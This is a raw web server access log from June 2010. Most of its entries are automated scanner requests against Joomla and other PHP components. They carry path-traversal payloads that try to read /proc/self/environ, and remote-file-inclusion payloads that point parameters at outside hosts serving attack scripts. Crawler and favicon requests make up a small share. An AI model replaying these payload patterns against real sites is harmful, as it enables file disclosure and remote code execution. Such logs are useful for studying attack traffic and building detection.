67.59.156.163 - - [12/Jun/2010:21:36:10 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:36:10 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:36:10 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
219.240.36.36 - - [12/Jun/2010:21:38:54 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:38:55 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:38:55 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 323 "-"""
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET /logs/access_log.1274313600%20%20//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-"""
78.46.70.228 - - [12/Jun/2010:21:39:39 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
219.240.36.36 - - [12/Jun/2010:21:39:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:39:48 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:39:49 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
65.52.108.58 - - [12/Jun/2010:21:45:37 -0500] "GET /logs/access_log.1242172800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.93.240.60 - - [12/Jun/2010:21:51:43 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.60 - - [12/Jun/2010:21:51:43 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.99 - - [12/Jun/2010:21:51:50 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.99 - - [12/Jun/2010:21:51:51 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.122 - - [12/Jun/2010:21:51:57 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.122 - - [12/Jun/2010:21:51:57 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.63 - - [12/Jun/2010:21:52:00 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.63 - - [12/Jun/2010:21:52:01 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.58.183.16 - - [12/Jun/2010:21:52:35 -0500] "GET /logs/access_log.1274572800//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
207.58.183.16 - - [12/Jun/2010:21:52:35 -0500] "GET //index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.58.183.16 - - [12/Jun/2010:21:52:35 -0500] "GET /logs//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.195.112.180 - - [12/Jun/2010:21:53:09 -0500] "GET /logs/access_log.1198108800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.243.67.208 - - [12/Jun/2010:21:57:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
202.71.108.28 - - [12/Jun/2010:22:00:13 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:00:32 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:00:32 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:00:33 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:00:56 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:00:57 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
60.234.132.61 - - [12/Jun/2010:22:03:05 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
60.234.132.61 - - [12/Jun/2010:22:03:11 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.199.46 - - [12/Jun/2010:22:04:39 -0500] "GET /logs/access_log.1221609600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.206.82 - - [12/Jun/2010:22:07:39 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:07:39 -0500] "GET /logs/access_log.1270598400//include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:07:39 -0500] "GET //include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:07:44 -0500] "GET //include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:07:44 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:07:47 -0500] "GET /logs/access_log.1270598400//include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:08:18 -0500] "GET /logs/access_log.1270771200//include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:08:25 -0500] "GET /logs/access_log.1270771200//include/scripts/export_batch.inc.php?DIR=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
67.195.112.180 - - [12/Jun/2010:22:11:43 -0500] "GET /logs/access_log.1273449600 HTTP/1.0" 200 596252 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.71.108.28 - - [12/Jun/2010:22:15:26 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:15:27 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:16:46 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:17:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:17:41 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
202.71.108.28 - - [12/Jun/2010:22:17:42 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
60.234.132.61 - - [12/Jun/2010:22:17:52 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
60.234.132.61 - - [12/Jun/2010:22:18:01 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.71.188.11 - - [12/Jun/2010:22:20:02 -0500] "GET //com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:03 -0500] "GET /logs//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:03 -0500] "GET /logs/access_log.1274313600//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:03 -0500] "GET /logs/access_log.1274227200//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:11 -0500] "GET //com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:11 -0500] "GET /logs//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:11 -0500] "GET /logs/access_log.1274313600//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:20:12 -0500] "GET /logs/access_log.1274227200//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.195.112.180 - - [12/Jun/2010:22:20:51 -0500] "GET /logs/access_log.1223078400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.66.34 - - [12/Jun/2010:22:22:48 -0500] "GET /?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
174.133.66.34 - - [12/Jun/2010:22:22:48 -0500] "GET /logs/?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
174.133.66.34 - - [12/Jun/2010:22:22:49 -0500] "GET /logs/access_log.1274832000/?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
66.71.188.11 - - [12/Jun/2010:22:23:05 -0500] "GET /logs//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:23:05 -0500] "GET //com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:23:05 -0500] "GET /logs/access_log.1274227200%20%20//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:23:06 -0500] "GET /logs/access_log.1274313600%20%20//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:24:46 -0500] "GET //com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:24:46 -0500] "GET /logs//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:24:46 -0500] "GET /logs/access_log.1274227200%20%20//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.71.188.11 - - [12/Jun/2010:22:24:48 -0500] "GET /logs/access_log.1274313600%20%20//com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://zome-harmony.com/language/backup1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.219.199.50 - - [12/Jun/2010:22:30:07 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.219.199.50 - - [12/Jun/2010:22:30:07 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
219.240.36.36 - - [12/Jun/2010:22:30:12 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.59.156.163 - - [12/Jun/2010:22:35:20 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:20 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:20 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:20 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:20 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:21 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:21 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:22:35:21 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
59.42.10.71 - - [12/Jun/2010:22:36:42 -0500] "GET ///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 200 1008 "-""libwww-perl/5.831"
123.243.67.208 - - [12/Jun/2010:22:37:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.15.152.183 - - [12/Jun/2010:22:38:53 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [12/Jun/2010:22:38:53 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [12/Jun/2010:22:38:53 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.15.152.183 - - [12/Jun/2010:22:39:05 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.149.207.129 - - [12/Jun/2010:22:39:22 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
62.149.207.129 - - [12/Jun/2010:22:39:22 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.35.80.52 - - [12/Jun/2010:22:39:24 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
72.35.80.52 - - [12/Jun/2010:22:39:24 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.35.80.52 - - [12/Jun/2010:22:39:24 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
72.35.80.52 - - [12/Jun/2010:22:39:24 -0500] "GET /logs/access_log.1271980800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.149.207.129 - - [12/Jun/2010:22:39:27 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
66.194.249.108 - - [12/Jun/2010:22:39:52 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.194.249.108 - - [12/Jun/2010:22:39:52 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
66.194.249.108 - - [12/Jun/2010:22:39:52 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
66.194.249.108 - - [12/Jun/2010:22:39:58 -0500] "GET /logs/access_log.1271980800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
187.45.193.159 - - [12/Jun/2010:22:47:15 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [12/Jun/2010:22:47:16 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [12/Jun/2010:22:47:49 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.133.206.82 - - [12/Jun/2010:22:48:51 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:48:51 -0500] "GET /logs/access_log.1273363200%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:49:00 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:49:00 -0500] "GET /logs/access_log.1273363200%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:49:00 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.133.206.82 - - [12/Jun/2010:22:49:01 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
187.45.193.159 - - [12/Jun/2010:22:53:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
187.45.193.159 - - [12/Jun/2010:22:53:59 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [12/Jun/2010:22:54:00 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.30.142.216 - - [12/Jun/2010:22:54:01 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [12/Jun/2010:22:54:01 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
187.45.193.159 - - [12/Jun/2010:22:54:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [12/Jun/2010:22:57:50 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [12/Jun/2010:22:57:51 -0500] "GET /?M=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.115.31.121 - - [12/Jun/2010:23:03:17 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
213.115.31.121 - - [12/Jun/2010:23:03:18 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
67.228.226.12 - - [12/Jun/2010:23:04:31 -0500] "GET /logs//index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
